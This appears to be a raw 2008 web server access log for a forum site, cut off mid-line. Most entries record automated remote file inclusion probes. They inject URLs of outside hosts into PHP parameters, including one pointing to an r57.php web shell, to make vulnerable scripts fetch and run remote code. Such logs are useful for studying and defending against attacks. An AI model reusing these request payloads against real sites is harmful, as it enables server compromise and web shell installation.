64.34.164.227 - - [22/Jun/2008:20:56:23 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
201.17.3.26 - - [22/Jun/2008:20:57:11 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.6.22.153 - - [22/Jun/2008:20:58:31 -0700] "GET /logs/access_080121.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
200.203.245.7 - - [22/Jun/2008:20:58:41 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.237.105.23 - - [22/Jun/2008:20:58:47 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=:ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.237.105.23 - - [22/Jun/2008:20:58:47 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=:http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.237.105.23 - - [22/Jun/2008:20:58:47 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=:ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.237.105.23 - - [22/Jun/2008:20:58:47 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=:http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:59:55 -0700] "GET /logs/access_080609.log/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:59:56 -0700] "GET /include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:59:56 -0700] "GET /logs/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
208.99.194.216 - - [22/Jun/2008:21:04:22 -0700] "GET //main.php?sayfa=http://www.b470-killer.kit.net/r57.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:21:05:18 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:21:05:23 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.159.55.66 - - [22/Jun/2008:21:07:08 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/rais_corp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
209.159.55.66 - - [22/Jun/2008:21:07:09 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/rais_corp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
209.159.55.66 - - [22/Jun/2008:21:07:09 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/rais_corp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:21:09:29 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
208.99.194.216 - - [22/Jun/2008:21:10:33 -0700] "GET /logs/access_080324.log//main.php?sayfa=http://www.b470-killer.kit.net/r57.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [22/Jun/2008:21:10:33 -0700] "GET /logs//main.php?sayfa=http://www.b470-killer.kit.net/r57.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [22/Jun/2008:21:10:59 -0700] "GET /lo